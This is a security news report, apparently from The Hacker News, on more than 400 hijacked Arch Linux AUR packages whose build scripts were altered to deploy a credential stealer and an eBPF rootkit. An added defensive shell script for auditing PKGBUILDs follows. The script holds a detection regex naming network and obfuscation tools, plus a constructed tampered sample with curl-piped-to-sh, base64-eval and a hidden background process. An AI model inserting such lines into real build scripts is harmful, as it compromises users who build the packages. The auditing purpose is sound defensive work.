The Hacker News

Over 400 Arch Linux AUR Packages Hijacked to Deploy Infostealer and eBPF Rootkit

Attackers compromised more than 400 packages in the Arch User Repository (AUR) this week, modifying their build scripts to deploy a credential stealer. The malware is a Rust binary that targets developer secrets and, when it obtains root privileges, can install an eBPF rootkit to conceal its presence.

The AUR is a community-driven package repository for Arch Linux that operates independently of the official repositories. Users fetch a package's build script and run it on their own machine, which is why a tampered build script is enough to deliver malware.

Security researchers discovered the compromise when they observed malicious code in the build scripts of numerous AUR packages. The attackers appear to have gained control of the maintainer accounts for these packages, which allowed them to push the malicious updates.

The stolen credentials could include API keys, SSH keys and other sensitive material, and could lead to further system compromises or data breaches. If the eBPF rootkit is successfully deployed, the malware becomes exceptionally difficult to detect and remove, because it operates at the kernel level.

Arch Linux users are advised to review their installed AUR packages and to be cautious when building packages from the AUR, especially packages with a recent history of updates or packages maintained by newly created accounts. The Arch Linux security team has been notified and is working to remediate the compromised packages and to determine the full extent of the breach.

The incident highlights the security risks of community-maintained software repositories and the importance of robust security practices for package maintainers and users alike.
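As an added practical check (this script is not from The Hacker News article or from the Arch Linux project), the following POSIX shell script audits an AUR clone's PKGBUILD and `*.install` hooks for constructs a legitimate build script rarely needs: a direct `curl`/`wget` download, base64 decoding, `eval`, bash `/dev/tcp` sockets, detached background processes, `systemctl enable`, and `'SKIP'` checksums. The heuristics are assumptions about what a tampered build script tends to contain, not indicators for the malware described above, and the two sample PKGBUILDs the script creates are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not code from The Hacker News or the Arch Linux project.
# Heuristic pre-build audit for AUR build scripts (PKGBUILD and *.install).
# The patterns below are assumptions about what a tampered build script tends
# to contain, not signatures for the malware in the article.

# One alternative per heuristic, joined into a single extended regex.
SUSPICIOUS_RE="(^|[^[:alnum:]_])(curl|wget)[[:space:]]"             # makepkg fetches source=() itself; a direct download is unusual
SUSPICIOUS_RE="$SUSPICIOUS_RE|base64[[:space:]]+(-d|--decode)"       # decoding a hidden payload or URL
SUSPICIOUS_RE="$SUSPICIOUS_RE|(^|[^[:alnum:]_])eval[[:space:]]"      # executing a constructed string
SUSPICIOUS_RE="$SUSPICIOUS_RE|/dev/tcp/"                             # raw socket via bash
SUSPICIOUS_RE="$SUSPICIOUS_RE|(^|[^[:alnum:]_])(nohup|setsid)[[:space:]]"       # detaching a background process
SUSPICIOUS_RE="$SUSPICIOUS_RE|systemctl[[:space:]]+(--user[[:space:]]+)?enable" # persistence via a unit
SUSPICIOUS_RE="$SUSPICIOUS_RE|'SKIP'"                                # checksum verification disabled (normal only for VCS sources)

# scan_build_script FILE: print "LINE:TEXT" for each non-comment line that
# matches a heuristic. Prints nothing for a clean file; always exits 0.
scan_build_script() {
    grep -nE "$SUSPICIOUS_RE" "$1" | grep -vE '^[0-9]+:[[:space:]]*#' || true
}

# count_suspicious FILE: number of flagged lines, as an integer on stdout.
count_suspicious() {
    scan_build_script "$1" | wc -l | tr -d ' '
}

# audit_clone DIR: scan the PKGBUILD and every *.install hook in an AUR clone
# (git clone https://aur.archlinux.org/<pkgname>.git). Returns 1 if anything
# was flagged, so it can gate a makepkg run.
audit_clone() {
    flagged=0
    for f in "$1"/PKGBUILD "$1"/*.install; do
        [ -f "$f" ] || continue
        hits=$(count_suspicious "$f")
        if [ "$hits" -gt 0 ]; then
            echo "== $f: $hits suspicious line(s)"
            scan_build_script "$f"
            flagged=1
        fi
    done
    return "$flagged"
}

# write_samples DIR: two constructed PKGBUILDs (both invented): one clean, one
# tampered in the style the article describes (download-and-execute in
# build(), an encoded payload, a detached helper, checksums disabled).
write_samples() {
    cat >"$1/PKGBUILD.clean" <<'EOF'
# Maintainer: Example Person <example@example.invalid>
pkgname=hello-tool
pkgver=1.2.0
pkgdesc="Constructed clean example"
source=("https://example.invalid/hello-tool-$pkgver.tar.gz")
sha256sums=('e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855')
build() { cd "$pkgname-$pkgver" && make; }
package() { cd "$pkgname-$pkgver" && make DESTDIR="$pkgdir" install; }
EOF
    cat >"$1/PKGBUILD.tampered" <<'EOF'
# Maintainer: Example Person <example@example.invalid>
pkgname=hello-tool
pkgver=1.2.1
pkgdesc="Constructed tampered example"
source=("https://example.invalid/hello-tool-$pkgver.tar.gz")
sha256sums=('SKIP')
build() {
  cd "$pkgname-$pkgver"
  # comment mentioning curl is not flagged
  curl -fsSL "https://example.invalid/setup" | sh
  make
}
package() {
  cd "$pkgname-$pkgver" && make DESTDIR="$pkgdir" install
  eval "$(printf aGVsbG8= | base64 -d)"
  nohup /tmp/.helper >/dev/null 2>&1 &
}
EOF
}

# demo: write both samples to a temporary directory and audit each one.
demo() {
    tmp=$(mktemp -d)
    write_samples "$tmp"
    for f in "$tmp"/PKGBUILD.clean "$tmp"/PKGBUILD.tampered; do
        echo "== $f: $(count_suspicious "$f") suspicious line(s)"
        scan_build_script "$f"
    done
    rm -rf "$tmp"
}

# Usage: sh audit-pkgbuild.sh demo   (or source the file and call audit_clone)
if [ "${1:-}" = "demo" ]; then
    demo
fi
```

`pacman -Qm` lists installed packages that are not in any configured official repository, which on a typical Arch system is the AUR-installed set; for each one, `git clone https://aur.archlinux.org/<pkgname>.git`, check `git log` for recent pushes and unfamiliar committers, and run `audit_clone` on the clone before `makepkg`. A flagged line is a prompt to read the script, not a verdict: `'SKIP'` is normal for VCS sources, and the scan is line-based, so it misses a payload split across lines or hidden inside a patched source tarball.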

Original source — read the full reporting at the publisher:

Read on The Hacker News